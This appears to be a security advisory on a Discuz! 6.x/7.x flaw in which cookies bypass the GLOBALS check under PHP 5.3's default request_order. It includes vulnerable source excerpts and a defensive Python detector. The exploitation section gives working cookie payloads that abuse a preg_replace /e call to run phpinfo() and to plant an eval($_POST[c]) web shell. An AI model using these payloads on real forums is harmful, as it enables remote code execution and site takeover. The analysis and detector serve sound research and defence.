Discuz! 6.x/7.x global variable protection bypass causes command execution
Vulnerability Overview:
In PHP 5.3.x, the default value of request_order in php.ini is GP, which leads to a global variable protection bypass vulnerability in Discuz! 6.x/7.x.
Vulnerability Analysis: code in include/global.func.php:
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach($$_request as $_key => $_value) {
        $_key{0} != '_' && $$_key = daddslashes($_value);
    }
}
This code emulates register_globals. When magic_quotes_gpc is off, daddslashes() is applied to each value before it is registered as a variable; a value read directly from $_GET/$_POST/$_COOKIE, however, is not processed. In the Discuz! source few places read $_GET/$_POST/$_COOKIE directly, so there are few such vulnerabilities :(
There are other ways around it, though. With register_globals = on, submitting a GLOBALS variable bypasses the code above. To prevent this, Discuz! has the following check:
if (isset($_REQUEST['GLOBALS']) OR isset($_FILES['GLOBALS'])) {
    exit('Request tainting attempted.');
}
So we cannot submit a GLOBALS variable at all?
The contents of the $_REQUEST superglobal depend on the request_order setting in php.ini. In the latest PHP 5.3.x series the default value of request_order is GP, so by default $_REQUEST contains only $_GET and $_POST, not $_COOKIE. The GLOBALS variable can therefore be submitted via a cookie :)
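As an added defensive example (not part of the original advisory or of the Discuz! code base), the following Python inspects every parameter source of an HTTP request independently of request_order, which is exactly what the $_REQUEST-based guard above fails to do. The sample request is constructed; the hostname and file names in it are placeholders.

```python
import re
from urllib.parse import parse_qsl, unquote

# A parameter name that register_globals (or Discuz!'s emulation of it)
# would register under $GLOBALS, e.g. GLOBALS[_DCACHE][smilies][searcharray].
GLOBALS_KEY = re.compile(r"^GLOBALS(\[|$)")

# Constructed sample request carrying the cookie payload described on this
# page (not a real capture; hostname is a placeholder).
SAMPLE_REQUEST = (
    "GET /viewthread.php?tid=1 HTTP/1.1\r\n"
    "Host: forum.example\r\n"
    "Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; "
    "GLOBALS[_DCACHE][smilies][replacearray]=phpinfo()\r\n"
    "\r\n"
)

def _cookie_pairs(header):
    """Split a Cookie header into URL-decoded (name, value) pairs."""
    pairs = []
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            pairs.append((unquote(name), unquote(value)))
    return pairs

def find_globals_injection(raw_request):
    """Return (source, name, value) for every GET, POST or COOKIE parameter
    whose name targets $GLOBALS. Unlike a check on $_REQUEST, this does not
    depend on request_order, so a cookie-only submission is still caught."""
    head, _, body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    target = lines[0].split(" ", 2)[1]
    sources = [("GET", parse_qsl(target.partition("?")[2], keep_blank_values=True))]
    if body:
        sources.append(("POST", parse_qsl(body, keep_blank_values=True)))
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            sources.append(("COOKIE", _cookie_pairs(value)))
    return [(src, name, value)
            for src, pairs in sources
            for name, value in pairs
            if GLOBALS_KEY.match(name)]

if __name__ == "__main__":
    for src, name, value in find_globals_injection(SAMPLE_REQUEST):
        print(f"{src}: {name} = {value!r}")
```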
Vulnerability Exploitation
include/discuzcode.func.php
function discuzcode($message, $smileyoff, $bbcodeoff, $htmlon = 0, $allowsmilies = 1, $allowbbcode = 1, $allowimgcode = 1, $allowhtml = 0, $jammer = 0, $parsetype = '0', $authorid = '0', $allowmediacode = '0', $pid = 0) {
    global $discuzcodes, $credits, $tid, $discuz_uid, $highlight, $maxsmilies, $db, $tablepre, $hideattach, $allowattachurl;

    if($parsetype != 1 && !$bbcodeoff && $allowbbcode && (strpos($message, '[/code]') || strpos($message, '[/CODE]')) !== FALSE) {
        $message = preg_replace("/\s?\[code\](.+?)\[\/code\]\s?/ies", "codedisp('\\1')", $message);
    }

    $msglower = strtolower($message);

    //$htmlon = $htmlon && $allowhtml ? 1 : 0;
    if(!$htmlon) {
        $message = $jammer ? preg_replace("/\r\n|\n|\r/e", "jammer()", dhtmlspecialchars($message)) : dhtmlspecialchars($message);
    }

    if(!$smileyoff && $allowsmilies && !empty($GLOBALS['_DCACHE']['smilies']) && is_array($GLOBALS['_DCACHE']['smilies'])) {
        if(!$discuzcodes['smiliesreplaced']) {
            foreach($GLOBALS['_DCACHE']['smilies']['replacearray'] AS $key => $smiley) {
                $GLOBALS['_DCACHE']['smilies']['replacearray'][$key] = '';
            }
            $discuzcodes['smiliesreplaced'] = 1;
        }
        $message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);
    }
    // ... remainder of the function omitted in this excerpt
}
Note the line:
$message = preg_replace($GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['_DCACHE']['smilies']['replacearray'], $message, $maxsmilies);
Carry the following in the request Cookie:
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui
GLOBALS[_DCACHE][smilies][replacearray]=phpinfo()
This runs phpinfo().
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui
GLOBALS[_DCACHE][smilies][replacearray]=eval($_POST[c])%3B
That is, a Trojan.
This vulnerability is deeply hidden and not easily discovered.
Conditions for exploitation:
1. discuz 6.x/7.x
2. request_order is left at its default value, GP.